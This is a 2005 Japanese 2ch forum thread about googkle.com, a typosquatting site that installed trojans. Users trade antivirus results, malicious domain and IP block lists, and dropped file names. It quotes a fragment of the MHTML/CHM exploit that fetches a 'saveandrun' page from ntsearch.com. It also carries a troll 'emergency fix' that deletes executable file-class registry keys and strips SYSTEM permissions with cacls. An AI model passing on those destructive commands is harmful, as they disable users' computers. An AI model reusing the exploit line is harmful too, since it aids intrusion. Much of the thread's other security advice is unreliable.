googkle.comに飛ぶとPCが乗っ取られる

「google.com」と入力するつもりで「googkle.com」としてしまうと、複数のマルウェアが
自動的にダウンロードされ、PCが乗っ取られる。

　GoogleのURL入力ミスに突け込んで、「Googkle.com」というサイトで
不正コードがばら撒かれているという。セキュリティ企業のF-Secureが
このほど詳しい情報を公開した。

　GoogleのURLをキーボードで入力する際、「l」の隣にある「k」のキーに指が触れて
「Googkle」になってしまうのはよくあること。問題のサイトはこれに突け込んだもので、
ユーザーがGoogleのつもりでアクセスすると、トロイの木馬やバックドアプログラムなど
多数のマルウェアが自動的にダウンロードされ、コンピュータが乗っ取られてしまうという。

　F-Secureでは決してGoogkleのサイトには行かないよう、ユーザーに注意を呼び掛けている
http://www.itmedia.co.jp/enterprise/articles/0504/28/news017.html

http://www.google.com/
www.googkle.com/



どうにかしる

google.comと間違えてgoogkle.comに飛ぶとPC乗っ取り
http://news19.2ch.net/test/read.cgi/news/1114648359/

ヽ( ・∀・)ﾉ ≡●ｳﾝｺｰ>>1

FWで遮断すればいいじゃん

>>2

ﾉｰﾄｿ先生でブロックされるらしいが
McAfee でも反応する？

ノートン先生は守ってくれるみたいだけど、
ウイルスバスターはどうよ？

http://www.uploda.org/file/uporg84193.jpg
http://www.uploda.org/file/uporg84197.jpg

ノートン2002は反応しないよ

漏れF-Secureクライアントセキュリティーでよかったよ

コラの作り方
http://am25.com/goten/challenge/index.html

今からGoogkle.comに突入ＴＥＳＴ

セキュソフなしでもクリックしなきゃ平気と勝手に思ってるのよねぇ
でもgoogkleにとべない臆病な自分もいるのよねぇ

>>13
一度思い切って行ってみるといいよ

なんともなかったよ？

>>15
釣りご苦労

javascript切っててポップアップでないようにしとけば何ともないのね

この3レスみて確実に行くのやめた臆病な俺をﾃﾞｭｰｸ東郷と呼んでね

http://www.geocities.jp/llvlo_olvll/googkle.jpg

>>18
デューク更家だろw。

？ ウイルスバスター
○ ノートンアンチウイルス（最新）
○ JavascriptがOFF

× Win
× Mac
× Linux

× IE
○ Gecko

>>19は

NOD32＋アドアウェア＋スパイガード＋スパイウェアプラスター
という環境での反応でし

>>23
×スパイガード＋スパイウェアプラスター

○スパイウェアガード＋スパイウェアブラスター

>>17>>19で少し心が動いたが>>23を見て行かなくて良かったと胸をなでおろすノーセキュリティなﾃﾞｭｰｸ東郷

だめだ。
ｳｨﾙｽﾊﾞｽﾀｰ、一部遮断したけど複数通った。

手動で見つけていくつか削除したけどﾃﾞｽｸﾄｯﾌﾟに表示されるHTMLﾌｧｲﾙが削除しても削除しても復活する。
これ自動生成してる場所どこ…orz

MHTMLRedir.Exploitは、エクスプロイト(脆弱性の攻撃手法)であり、
駆除するものは何もないため、駆除方法はありません。MHTMLRedir.Exploitは、
ユーザのコンピュータ上で有害なコンテンツを実行可能にするエクスプロイト
に対する検出名です。シマンテックのウイルス対策製品は、
このエクスプロイトを検知することによって、その実行を阻止します。

これ、ActiveX、JavaScriptその他全部切ってても入る？

念のためGoBack3でGoogkleを踏む前の状態まで復元しますた。

恐らくJavascriptとActiveX切ってれば入らない。

別の板で踏みました…

Javaあり、ActiveXなし、AVG Flee反応なし。
ﾅﾝﾃｺｯﾀｲ

ポップアップ消去さえあれば問題なしとのこと。
糞ブラウザ使ってない限り大丈夫

ｽﾚｲﾌﾟﾆｰﾙでくらった

JAVAありIE、ポップアップ消去は入ってます（ぐーぐるばー）
踏んだらノートンが反応、ウイルススキャンしたらスパイウェアが２つ。
これってまだまだ危ないですか？

PC乗っ取りって何よ

また馬鹿みたいに貼りまくる猿がいそうだから
NG推奨。。
これ類似ドメインのgoogkle.co.jp、googlke.com googke.comなんかもヤバいの？

なんか強力そうだね、今日はイタズラでたくさん貼られるんだろうな、こわ〜

情報漏洩＋動作緩慢＋挙動不審

googie.comなんてのもありそうだ

時々コマンドプロンプトが突然開く

NOD32　クラックは反応したﾖﾝ。

>>36
すべてサーチサイトに飛ぶ模様
特に有害ではなさそうだが・・

>>30
JavaScriptは使ってるがActiveXは使ってねーだろ

mac osx 10.3.9 saffariで行ったけど、何も無し。
ウイルスまで未対応？

NOD32のスキャン結果
http://www.geocities.jp/llvlo_olvll/nod32_googkle.jpg

Firefox1.0.2で踏んだけどポップアップとか出なかったぞ

つーか、（人間の）感覚的に何も起きて無くても、やられてる場合はあるぞｗ

>>1-48
感染おめｗ

>>48
おめｗｗ

>33
ｾｷｭﾘﾃｨはどんな感じにしてた？

>48
おめｗ

確かにｽｸﾘﾌﾟﾄの仕組みを解らない厨房には脅威だろうな。
絶対に踏まないことが防御策のように書いてあってﾜﾛﾀ。

548 名前：番組の途中ですが名無しです[] 投稿日：2005/04/28(木) 16:02:31 ID:X/cMX6kt0
web.exe
classload.jar
xz.exe
ggl.exe
next3.exe
next1.exe
next2.exe
ggl.exe
svchosts.exe
proxyrnd.exe
ldr.exe
toolbar.exe
inst.exe
winran.exe

もうなんつーかexeの応酬ですよ

http://news19.2ch.net/test/read.cgi/news/1114648359/299,411,548

IEの制限サイトに登録すればいいんでないの？

後から登録しても意味ないだろ馬鹿。
予防策は踏んではいけないということを広めること、
事後の対策を練ることが先決。

事前の？

事後。
踏んで、感染した場合にどうすりゃいいかってこと。

それをお前がやるの？ばか？

ブラウザ別実行実験

IE　あぼんぬ
Opera　あぼんぬ
Firefox　あぼんぬ
Netscape　(ﾟ�听)ｼﾗﾈ

トロイの種類もわからないのに踏むなよな。

>>59
感染者からどのようなファイルが実行されたか等のデータを集め、その対策を考える。
もっとも、お前は無能だから何もしなくて良い。

>>62
対策考えるのに煽りがなぜ必要かね？

>>62
そうか、ｶﾞﾝ(　ﾟдﾟ)ｶﾞﾚ

対策は誤字打ちしない

糸冬　了

googlkeって所に逝ってしまったんだけど問題ない？

実行された方は速やかに回線を切ってここに書き込まないで下さい

ちょっとwhoisしてみたんだが、
一般
GOOGKLE.COM
domain: googkle.com
status: lock
(以下略

のstatus lockってもうこのドメインに対するDNSは提供してないって事か？

VIPPERが解除ソフト作ってるってさ
ﾏｼﾞらしい

>66
問題ありまくり
ちょっとはｽﾚを読めよ

>VIPPERが作る解除ソフト
うさんくさすぎるｗ

>8の画像踏んでしまったんだけど、異様に重たかっただけで他は何とも無い。
何か問題あるのかな？

>71
確かにうさんくさいけど、
今度はﾏｼﾞらしいよ

俺スキルないから踏まないど
バスターちんに禁止登録しておいた
>>1ありがとー

俺foxだから登録できね
バスターもfoxには対応してないし

ActiveX
Java Applets
Hidden Frames
Java Script
VBS Script
Scripting ActiveX

これらを勝手に実行されなければネットブラウズに危険なものは何もないのよ

Googleで「エロメガネメイド」と入れて検索すると
一番上に出てくるサイトが、微妙にエロくて萌える。

http://www.google.co.jp/

例外
未知の脆弱性を突かれる

http:// 64.246.32.114
も禁止設定しておけ

>54のリンク先も見て、登録しとけ

http://www.f-secure.co.jp/v-descs/v-descs3/googkle.htm

このページ目を通しておいたがいいぞ

うーむ、初心者なので良くわかりませんが、とりあえずありがとうございました。

google.comと間違えてgoogkle.comに飛ぶとPC乗っ取り２
http://ex10.2ch.net/test/read.cgi/news4vip/1114670531/

あちこちに貼りだした予想通りのｱﾌｫがいるなｗ

JavaScriptONにしてて踏んだ。ポップアップはブロックされた。
ウイルスキラーが即座に一回反応して削除。
Ad-awareでひとつCriticalなやつが見つかって削除。
今のところ>>53に挙げられているプログラムは動いていない模様。
とりあえず回線切って総当りでスキャンします・・・

物好きな香具師多いな。

>>53がひとつもタスクマネージャーのプロセスに表示されてなければ、
とりあえず安心してOKなんでしょうか？

なんでダウンロードした実行ファイルが自動的に実行されるの？

なんであげるの？

トロイの木馬　恐怖　でｸﾞｸﾞﾚ

>>87
フォーマットが確実

踏んじまった、ノートンがMHTMLRedir.Exploitてのは削除してくれたみたいだけど、
どうしよう・・・再インスコすっかな？

>92
再ｲﾝｽｺなら確実

インスコめんどくせー。
とりあえず動かなくなったときのためにファイル退避だけしておくか・・・。

こういう時にやはり役立つよなぁ〜
http://pc8.2ch.net/test/read.cgi/software/1005870532/

root kit 恐怖でｸﾞｸﾞﾚ

F-Secure ウイルス情報
F-Secureのスタッフは、人気のWebサーチエンジン“Google.com”のURLを入力する際のタイプミスを利用
した、悪意のあるWebサイトを発見しました。もし、その悪意のあるサイトにアクセスしてしまうと、自動
的に多数のマルウェア ---ドロッパー型トロイ、ダウンローダー型トロイ、バックドア、プロキシ型トロ
イ、スパイ型トロイ等--- がダウンロードされインストールされます。また、幾つかのAdwareに関係する
ファイルもインストールされます。
http://www.f-secure.co.jp/v-descs/v-descs3/googkle.htm

>>53
svchosts.exeが出てるけどやばいかな？

ｦｲ
ニュースに気付かず騙されてリンク先にｱｸｾｸしたｵｲﾗですが、
特に何もありませんでしたよ

WinXP pro(たぶん最新)
IE(たぶん最新)
ｳｨﾙｽﾊﾞｽﾀ(昨年ぐらいから期限切れのまま)
IE設定　Jword対策でｱｸﾃｨﾌﾞXｵﾌ
ｸﾛｰｽﾞﾎﾟｯﾌﾟｱｯﾌﾟでポップ対策

ニュースに気付いてからAd何とかってｽﾊﾟｲｳｪｱ撃退ｿﾌﾄ走らせた
15個変なの見つかったけど、普段は20〜30見つかるから普通以下!?

ｸﾞｸﾞﾙ偽物って何がどうなるの？
明日にでもｳｨﾙｽﾊﾞｽﾀｰ最新版買ったほうがいいの？

>99
お前はとにかく>1から読んで来いと（ｒｙ
最新版を買ったからといっても、ｳｲﾙｽやﾄﾛｲに対応してなきゃ意味梨

普段は20〜30とか言ってる時点で終わってる

>>99
ザルすぎるぞ

えーと、興味があったので、
完全武装ゾーンアラーム＋オミトロン＋ＡＶＡＳＴでアクセス！

うーん特に何とも無いですよ。ガセじゃないの？

何あげてまで必死になってるの

とりあえず不安だから再インスコ中。パソが軽くなる＆安心できるからよしとするか。

[昇華]

vipスレだと、新種のウィルスはないという結論に達してるな

なんか、毎回起動時にホームページが変なのになるので、レジストリ変更用にHOMPE.REGっての作って、
スタートアップに入れたらちゃんとお気に入りのＨＰが表示されるようになった。
みんなもやってみるといいよ。

>>100
読んだけど感染者で実害あった人っていないでしょ

>>101
ｷｬｯｼｭが腐ってるから引っ掛かるみたい
ﾕｰｻﾞｰ名が日本語漢字だけど、文字化けしてることが多々ある

>>102
ザルって言われても…


SVCHOSTS.EXEって大文字ver.が出てるよ　沢山

　　（　＾ω＾）　…　
　　（⊃⊂）

　　（＾ω＾）⊃　ｱｳｱｳ!!!
　⊂ミ⊃　）
　 ／　　　ヽ

ロシアねぇ・・・。

ｱｸﾁﾌﾞXやらjavaやら切ってたら
実害はないということ？
ページ自体に先生も反応しないし

ガセなのかと思えてきた訳だが…

具体的被害は無いのかよ

//tinyurl.com/9sa6r

これもNGワードとかにいれといたほうがいい。
googkleに飛ばされたorz

>>1があぼーん

踏んでしまったんですが・・・
PCちょっと重くなりました・・・orz
アホだ

また、一陣会か…　＿|￣|○

「セックスマシン」「奴隷ゲーム」ソウル最大の暴力サークルを摘発
http://japanese.joins.com/html/2005/0427/20050427180501400.html



あと、一応これも置いとく

Googleのスペルミス悪用サイト、アクセスするとPC乗っ取り
http://www.itmedia.co.jp/enterprise/articles/0504/28/news017.html

ガセじゃ無いけど今すぐ被害が出るって事はないでしょ。
まぁ自分のPCに異物が入ってるてのは気分悪いけど

すまん、ミスった

逝ってくる

javaを有効にする奴は池沼

他板で間違って踏んでしまった。
ノートンが削除してくれたみたいだが
何故か２ちゃんねるの壺までは行けるのに
その先の掲示板が開かなくなってしまった。
一瞬表示されてすぐ消える。
何故だ。
ちなみにこれは携帯版から書き込みしてます。

俺も>>114の踏んじゃった･･･
通常、セーフで検索しても何も見つからない
踏んだ後に作成された怪しいファイルもない
タスクマネージャに新しく増えたexeもない

ちなみに検索に使ったのがバスター　spybot　Ad　オンラインスキャン
ブラウザはFirefox

大丈夫かな？(´･ω･`)

　　　　∧__∧
　　　 (´･ω･｀) 知らんがな。
　　　.ノ^　yヽ、 　
　　　ヽ,,ﾉ==l ﾉ
　　　　/ 　l |
"""~""""""~"""~"""~"

報告なのか遠回しに教えてクレクレなのか
どっちなんだろう

>>122
全ファイルの履歴を取ってみろ。
なんだか、tempに怪しげなやつらが鎮座してるから。
消しても消しても復活しやがる。
監視してるプロセスも見つからないし、runやスタートアップにも
見当たらない。もちろん、Windowsの本体ファイルなら、
AVGが検出してくれるだろうから、どうみてもスパイウェアだ。
しかし、何度消しても再起動すれば現れる。
セーフモードなら現れない・・・いったいどこに巣食ってんのじゃ！！！

>>125
レジストリでは？

IEで感染したのはポップアップをブロックしてないからであって

バカしか感染しませんのでご安心下さい

F-Secureのサイトではバックドアトロイも仕掛け銀行系のデーターを漏洩するをある。
人柱になるのなら個人を特定汁データは退避させておくことだな。

Jane　Doe　で感染した場合はブラウザごと削除すれば問題ないのでしょうか？

ほとんどのウイルスはこれで何とかしてきたつもりです
なんとかなってないのかもしれませんが・・・

ウイルスバスターならURLフィルタに登録すればOKだね

とりあえずNISの制限ゾーンに
googkle.com
ntsearch.com
toolbarpartner.com
toolbarpartner.com
sturfajtn.com
topantivirus.biz
この6個を入れといた。

(;ﾟдﾟ)ｧ.... ！1個ダブってた。。。

>>131
toolbarpartner.com を二回も入れてるところを見ると、
よっぽど酷い目にあったんだろうね。

NISだとNorton Internet Securityだってすぐに分からないから、きちんと
「Norton Internet Security」って書いてね。

>>131
あ、こういうの助かる
他にもある？

iptablesならmangleテーブル辺りのPREROUTINGで送信元・先がそれなのをDROPすればいい

>>135
>>54

>>135
４００近くあるけど、晒すか？

>>135
テメェで調べろ
死ね

これって、IEの脆弱性を利用してて今はMicrosoftのアップデートを待つしか無い状態なの？

ドメインをブラックリストに入れたりするのは、根本的な解決にならないと思うんだが。
同手法の模倣サイトが有ったらやられちゃうでしょ。
そこで別シグネチャのEXEファイルを使われたら、F-SECUREのユーザでも無抵抗では？

>>140
この脆弱性はすでに修正されていたはずでは？

>>137
多謝

Ieの脆弱性と言うか
ポップアップとJavaScriptオンにしてたらどれ使って用があかんのじゃないの？
http://news19.2ch.net/test/read.cgi/news/1114648359/724

.comより2ch.netの方が安心できるこんな世の中じゃ

SP2をデフォのまま使ってたらセーフなんじゃないの？

どのファイルがあったらアウトって言ってもらえると大変ありがたい

マックで踏んだけどセーフ？

>>147
マックの時点で人間失格

打ち間違いが心配ならhostsファイルに

googkle.com 127.0.0.1

とでも書いておけば？

これなら名前解決に失敗するからURLを間違えても平気。

うげー、ニュー速の関連スレ踏んだらパソコン壊れたぁ〜
２ｃｈのスレ自体にブラクラ書き込めるわけ？？？？
だめだろこれ。

>>144
ぽいずぅん

とりあえずまとめてみた。
俺はNIS（ノートン）なんで制限ゾーンに
googkle.com 64.246.32.114
gfoogle.com 64.246.32.114
ghoogle.com 64.246.32.114
googfle.com 64.246.32.114
luycos.com 64.246.32.114
msmn.com 64.246.32.114
msn1.com 64.246.32.114
passpport.com 64.246.32.114
spacebit.com 64.246.32.114
winprogramming.com 64.246.32.114
winroot.com 64.246.32.114
xcnn.com 64.246.32.114
ns1.ntsearch.com 64.246.32.114

ここまでまとめてIPで64.246.32.114で追加

free32.com 64.246.40.84
ns1.goldenpix.com 64.246.40.84

2個をIPで64.246.40.84で追加

↓あとは個別にIPでもドメインでも可↓
ns2.ntsearch.com 64.246.33.205
ns2.goldenpix.com 64.246.40.242
ntsearch.com 67.15.52.40
toolbarpartner.com
sturfajtn.com
topantivirus.biz

良ｽﾚage

上がってねえ

痛い発言してるヤツいっぱいいるな・・・

結局被害に遭った香具師はいないのか？

>>156
たぶんﾉｼ…

http://news19.2ch.net/test/read.cgi/news/1114648359/724,967

Macも影響あるらすぃ

すぐノートンが反応したけど、スパイウェア駆除とウイルススキャンで
大丈夫かな・・・？

グーグルToolbarでpopup blockしてたからとりあえず大丈夫みたい。。。
新しいウィンドウさえ開かなきゃ大丈夫なんだよね？

初心者スレ逝ってくれ

それ踏んで感染しても次のこと試せば直る。
コピペだけど効果抜群さ。
緊急処置（簡易版）

　1:WindowsMEないしWindowsXPはシステムの復元を無効にします
　2:PCをセーフモードで起動します
　3:「スタート」メニューを開いて、ファイルを指名して実行をクリック
　4:regeditと入力してOKをクリック→レジストリエディタが開く
　5:以下のキーを削除する
　 HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
　 HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
　 HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
　 HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
　 HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
　 HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
　（dllはウィルス・exeはトロイ/ワーム・sysはスパイウェア）
　6:作業終了→レジストリエディタを終了して、PCを通常モードで再起動
　7:緊急処置完了！
まだ直らなかった場合、次のことをやりなさい。
真・パソコンのトラブル解消法

1:WindowsMEないしWindowsXPはシステムの復元を無効にします
2:PCをセーフモードで起動します
3:「スタート」メニューを開いて、ファイルを指名して実行をクリック
4:cacls c:\ /t /e /p system:nと入力してOKをクリック
（エラーになる場合は、cacls c:\ /g system:f→cacls c:\ /t /e /p system:n）
5:作業終了→PCを通常モードで再起動
6:問題解決！！（100%解決）→ ｳﾏｰ(^∀^)

>>162
PCが起動しなくなりました

>>99痛すぎｗ
>>98
もう飽きたぞ。ｷﾁｶﾞｲはおとなしく眠ってろ！

Windows Update 無し、セキュリティソフト無しでgoogkle.comに行くのと、
>>162を実行するのってどっちが危ないですか

>>165
末期ガンとエイズくらいの違い

アンカー間違えた。
>>162
もう飽きたぞ。ｷﾁｶﾞｲはおとなしく眠ってろ！

今のとこ>>152これが予防策？

＞162
これは本当の対処法なの？システムのアイコンが利かないんだけどもう手遅れ？

>>169
システム復元をお勧めする

>>162は禁断のテンプレ。
やると大変なことになる。

＞170-171サンクス。やってみます。

opera 7.23で踏んだ
ポップアップ有効にしてたけどポップアップなんか出てこなかったぞ。
むしろよくわからん　http://404〜とかいうサイトにとんだ
なにか知らないけど助かったのかな

>>173
それ感染してる

具体的に感染するとどういう状態、症状が出るの？

尿が近くなります

>>175
さっき俺が書いたレスだけど


75 名前： 名無しさん＠お腹いっぱい。 [sage] 投稿日： 2005/04/29(金) 00:43:30 ID:???
踏んじゃったんだけど、実害ってどんなもん？

IE立ち上げた時のスタートページが「daosearch.com」にされてるのと、
Googleで検索した時に変なのまで出てくるのと、
ブラウザに変なバーが出るのと。

こんな症状なんだけど、見えない所にもっとヤバいのがあったりする？

>>177
ある。おまいさんの情報がだだ漏れ

javaやjava_scやactiveXは通常切ってて、必要なときだけ入れるがいいよ。
あと、googkleはpeerguardianのブロックリストに昔から入ってた。
今後のために入れとけ。
ttp://www.methlabs.org/

>>149
66.102.7.104　www.googkle.comにしておいた。
間違って踏んでも本当のgoogleに行ける。

>>174
さて、困ったｗｗｗｗ

>>175
もっと勉強しろ。ﾄﾛｲの木馬っていうのはなんでもありなんだよ。
メディアの警告通りPC乗っ取りまでできる。
ファイアーウォールの設定とかアンチウィルスソフトの定義更新とか、
基本的な対策を忘れている奴らがターゲットにされる。
他人のPCを操ってさらなる被害の増大をバレないようにやるんだよ。
症状がわかったらバレちまうだろ？ｗ

もういい
俺疲れたよ･･･

>>177
キーボードを打つたびに、通信してます。

漏れ、今踏んでスレイプニルのタブが作られて、ページが表示される前にタブをとじた。
ノートンの反応はなし。
どう
ついでにぷにるのエンジンはＩＥでつかってた

svchosts.exeっていうのはサーバーの役割をするんだろう。
ダウンローダーで怪しいものを落とされてひそかに実行される。

　155　名無し~3.EXE　[] 2005/04/29(金) 00:59:24 ID:zFjJCq/Y

GoogleでGoogkleって検索するとある仕掛け（google社員のいたずら）
が出ます。

こういうことやる奴、やっぱいるんだねぇ・・。

ノートンでポップアップ切ってたらノートン反応しなかった
アップデート後にスキャンしてもウイルス皆無だから問題無しだよね？
スパイウェアも削除したし

心配な人はフォーマット。何もなくても上級者には定期的にOSを入れ直す人もいる。

>>188
なぜ確信がないのに踏むのかが理解できない。

ノートンでスキャンすれば大丈夫？

>>190
あんた、オバケ屋敷とかバンジーとか認めないタイプだね。

>>188
ブラウザではポップアップ禁止しておらずノートンでは広告ブロックやってた状態で踏んだけど
オレも反応なかった。
TrendMicro・Symantec・F-Secureでオンラインスキャン、spybotとad-awareでスキャンしたけど
何も出てこない。
報告されてるexeも引っかからない。

>>192
あんた、セキュリティの基本を知らないならネットやらないほうがいいタイプだね。
ここは初心者が集まるような板ではないんだよ。

194。セキュリティを大いに語る

>>190
ワザとじゃなくjpgで偽装されたリンクでやられたの

>>194
初心者が集まるような板ではないんだよ
って、

そういう事、玄人が言うと思ってるわけ？

今からここは、バンジージャンプのスレに変わりました。

>>196
なんでjpgなんて踏むの？
専ブラ使ってないの？

こんな欠陥だらけの車売る会社や、個人情報漏洩する会社があったら速攻潰れる。
なぜマイクロソフトだけが許されるのか。

>>197
まあ馬鹿なことを質問しても相手にされないだけだから
まず初心者板へ逝った方がいいんじゃないかな？

何ですかこの去年の春天のような展開は

>>199
jpgくらい踏ませてください・・・

>>203
http://mado.livedoor.biz/e888feae.jpg
偽装リンクだったばあい、このようには表示されないから踏まなくて済む。

また livedoor か orz

朝一で踏んでこのスレで一日が終わってしまった

ヽ( ・∀・)ﾉ ≡●ｳﾝｺｰ ◆worRE2unko

はい　糞スレ終了

きんたまスレのときと同じだな

ttp://www.ntsearch.com/popengine/popup3.htm

このソースだとよ

data="？s-its:mhtml:file://C:\foo.mht!http://www.ntsearch.com/popengine/POP.CHM::/saveandrun.htm" type="text/x-scriptlet"></obje-->

>>209
制限サイトに入ってる。他行って荒らせ。

うそお！

>>1を携帯で踏んだらどうなるのよ？

ﾉｰﾄﾝが何も引っ掛けなきゃセーフでつか？

>>213
どうもならんらしいよ。

BitDefender Online Scannerでスキャンしたら

C:\System Volume Information\_restore{(省略)}\RP116\A0014722.exe　　 Infected with: Trojan.DDOS.UDPFlood.A
C:\System Volume Information\_restore{(省略)}\RP116\A0014722.exe 　　Disinfection failed
C:\System Volume Information\_restore{(省略)}\RP116\A0014722.exe　　 Deleted

C:\System Volume Information\_restore{(省略)}\RP117\A0014806.exe　　 Infected with: Trojan.Elite.2.8.0
C:\System Volume Information\_restore{(省略)}\RP117\A0014806.exe 　　Disinfection failed
C:\System Volume Information\_restore{(省略)}\RP117\A0014806.exe　　 Deleted

こんなのが出ましたとろじゃんDDosって攻撃に利用されそうになってたのか・・・

avast で誰か突っ込んでみてよ
IEのポップアップ外して、検出力高でさ

>>217
やめておいたほうが良いと思う。
かなりの割合でスカるから。

F-Secureでウイルス反応あり。
しかし、スパイボット最新更新後スキャンしたら・・・
BackWebLiteが引っかかった＿｜￣｜○　
レジストリ64コも・・・・
他のスパイウェアは反応なし。

PeerGuardian入れてみた。

ｺﾈ無料PCｻﾎﾟ依頼 三十六(36)計逃げるに如かず
http://pc8.2ch.net/test/read.cgi/win/1113029444/628

chmファイルを分解したらEXEが1個、EXEを読み込むHTMLファイルが1つ。
EXEのアイコンは透明で見るからに怪しかった。

>>219
うぬの力はその程度かーーーーーーーーーー

>>219
"BackWebLite"ってF-Secureのアップデーターか何かじゃなかったっけ

IEでポップアアップブロックしてたら無害ってことでOK?

>>224
うぬの力はその程度かーーーーーーーーーー

http://www.microsoft.com/japan/security/incident/download_ject.mspx

タコがあ！　このパッチを適用していたら無害だ
よくもまあ、そんな知識でセキュ板をふらついていられるな

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
　　　　　　　　　　　　　　　　　　　ここまで飛ばし読んだ
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

http://googkle.com/
avast!だとページ開くときにトロイの木馬検出してWEBシールドのダイアログ表示
選択肢は切断しかないから結局全部見ることはできない

>>228が見えない

>>228
俺何も反応しなかったavast
IEのポップアップブロック有効にしてたからかな？

>>230
性格悪い人が使ってると検出しないかもよ

これ>>1の感染したかどうかどうやったらわかるんだ？
ソースチェッカー越しに踏んだんだが

>>232
http://www.f-secure.co.jp/

このソフトを入れる

ノートンは入れてるんだが・・・

ソースチェッカー越しだったから大丈夫だったのかな

連レススマン

>>233
これの試用版を使えばいいのか？

>>235
まずはオンラインスキャンでどうぞ

googkle.comに飛ぶとPCが乗っ取られる

はい　糞スレ終了
勝手にインストールされるのは、トロイ系のスパイウェアだから

>>236
オンラインスキャン動かない・・・
なぜだ・・・スキャンできないじゃないか

>>228-234までがが透明あぼーんで見えない

特に>>238なんかはぜんぜん見えない

それは俺悪いことしたな
ｽﾏﾝｺ

JAVAはクライアントサイドではアプレットしか動かないから大したことはできない
ＪａｖａＳｃｒｉｐｔも大したことできないハズだが、結構厄介なのはある。穴だらけってことか？ＯＦＦだなＯＦＦ
ＡｃｔｉｖｅＸは論外。絶対にＯＦＦにしとけ。ＰＤＦとかはダウソしてＡＲで閲覧汁

そのgoogkle.comなんかの凶悪的な機能も、悪ティブXによるものか？

http://ex10.2ch.net/test/read.cgi/campus/1111819413/440-
440以降からID:INF5xG380に注目。
540、561 あたりで禿笑

実況見てて見事に踏んじゃったよ。
まあ、ポップアップブロックしてたから平気だけど。





平気だよね？（泣

システムにイタヅラソフツ埋め込むには、ユーザーにソフツ実行させる（トロイ）か、悪ティヴＸかしかない。
得体の知れん実行ファイルをクリックする馬鹿が多すぎる
それ以前にアド民権限でインターネッツに入ってくんなよ

つか、なんでIE使うかね

OperaならJavascript ONにしていようがpopup有効にしていようが全然平気。
ただしOperaそのものがスパイウェア。

一日経っても馬鹿しか集まってこねえな。このスレ削除。

もしかして落ちてる？
//www.googkle.com/

こんなユニークなURLよく取得したもんだな。

>>187
どうなるの？
検索するだけなら大丈夫かな

俺も>>187の155の言ってる意味が分からなかった
ちなみにgoogle日本語検索しても杵築高校ぐらいしか出て来ないね

AVGとSpywareBlasterとSpybotインスコ済みPCで
あくちぶXとすくりぷとを切って突撃してもヤバイのかな？

ああん、突撃してみてーｗ

俺はノートンの結果を知りたいな
あれだけノートン、ノートンって馬鹿騒ぎしてた割には
1件も報告がないじゃないか
本当は自信が無くて突っ込めないんじゃないか?

これってFirefoxでもかかるの？

かからない

試したい人は仮想環境で行けば？

今試したらgoogkle.comの名前解決が出来ない。
nslookupでエラーになる。
ISPのDNSで殺してんのか？

結局avast以外は全滅って事ですな

HDDをやられますた
もう最悪
買ってこなきゃ

そらCPUはやられんわな

オンラインショッピングしようと思ってたのに
踏んじゃったから怖くて個人情報入力できないから変えないよ！

>>260の誘導には負けないぜ

ソースチェッカーではどう出るの？

>>265
ソースが取得できませんでした。No such file or directory (2)
※ リクエストされた URL は見つかりませんでした。

もう終わってるっぽい？

>>266
サーバごと落ちたっぽい

>>264-267
安心しろ
サイトはまだ生きてるから
早くノートンで試せ

500 Can't connect to googkle.com

夜中にゾヌ2でこのスレをみてて、
リンクされた部分の上をカーソルで通過しただけで感染しちまった。
バスターの反応がでて回線は切れたが、
その後スキャンして駆除できなかったファイルがわかるだけで二つ。
ﾃﾝﾎﾟフォルダ内のIE5のキャッシュフォルダの中に
Sexy.htm(しかもこれはバスターでは未検出。1にあったサイトでオンラインスキャンしたらでてきた)
っていうのと、ながったらしい名前のzip(これが駆除失敗のほう)
時間がなかったのでPCつけたままLANケーブル引っこ抜いてきた。
家に帰ったら復旧作業が待ってるかと思うとｳﾂﾀﾞ

ググクル踏んじまった・・orz

スパイは消したけど
ウィルスってどうやってけしゃいいのかわからん

そのうちにノートンとか対応するんじゃないの？
リンク先が英語だからよく分からん。

誤字狙ったサイトって色々あるみたいだね、
ggogleとか、tahooとか、yagooとか、yafooとか…

デフォルトでjavascriptやacriveX切ってるから全く何にも無かったよ
こんなのでやられてたら海外の怪しいエロサイト怖くて行けないよ

acrive→activeの間違い

今更ですが、googkle←これ、なんて読んだらいい？

そもそもgoogleをgoogkleなんてリアルで間違える奴いないだろね

グーグクル

タイプミスを狙ってるんだろう。

>>276
グックル

>>187
この書き込みさ、グーグル社員のいたずら、と記述した時点で
グーグル本体から通報される可能性あるね。
貼った奴は思慮が足りないというか、なんというか。
つまらないことで人生躓くもんだと知れよ。

AVG、ZA、SpywareBlaster、Operaで
突っ込んでみました。

>>187
やってみたけど、何も起こらなかったよ
何が仕掛けられてるの？
ﾏｼﾞﾚｽきぼん

http://www.microsoft.com/japan/security/incident/download_ject.mspx

タコがあ！　このパッチを適用していたら無害だ
よくもまあ、そんな知識でセキュ板をふらついていられるな

はい　餌を与えないでね　帰った　帰った　

-----------------------------------終了----------------------------------

セキュ板住人ちゃうがな

普段は「お気に入り」からgoogleに行くから、打ち込むこと無いな。

>>284
知識自慢乙ｗ

自分もGoogle ツールバー入ってるから、Googleって打ち込むことはない。

もし、インターネットカフェでウィルス入りまくりの
ＨＰ参照して、感染したら、それって賠償？

まあ、元に戻せる機能がついてるのが
普通なんだが、俺が行く所は、一年前から
ずーと同じ設定た。ダクロリ踏んだろかとも
思うがどうだろうか。

これってサファリで踏むとどうなるの？

>>289
そんなの理科張りすれば良いんだから関係ないっしょ？
重要なデータが入ってるわけでもないし。

とりあえず、初心者の俺はおっかないので、この家族共用ＰＣでミスって誰か
が踏まないように制限付きサイト登録しときます。
これって感染後にノートン先生入れて何とかできる物ですか？

>>291
どうなんだろうね。オンラインゲームは一通り入ってるけど、
とてもじゃないが、キーロガーが怖くてできない（ｗ

平気で銀行決済とかしてるバカが居るのにびっくりだ。
(アクセス履歴もそのまま残ってる)
ほんと、日本国内にゾンビパソコンが１８０００台あるってのも
うなずける話だわな。

|-`).｡ｏO(･･･グックドットコムか)







|дﾟ).｡ｏO(･･･これ、ネイバーに貼ったら、あの国えらい事になりそうな予感)

>>294
日本語読める人もいるだろうし、もう向こうの関連サイトでも取り上げてるんじゃね？

いやーうっかり踏んじゃったんでウイルスチェイサー・ewidoで全スキャン、
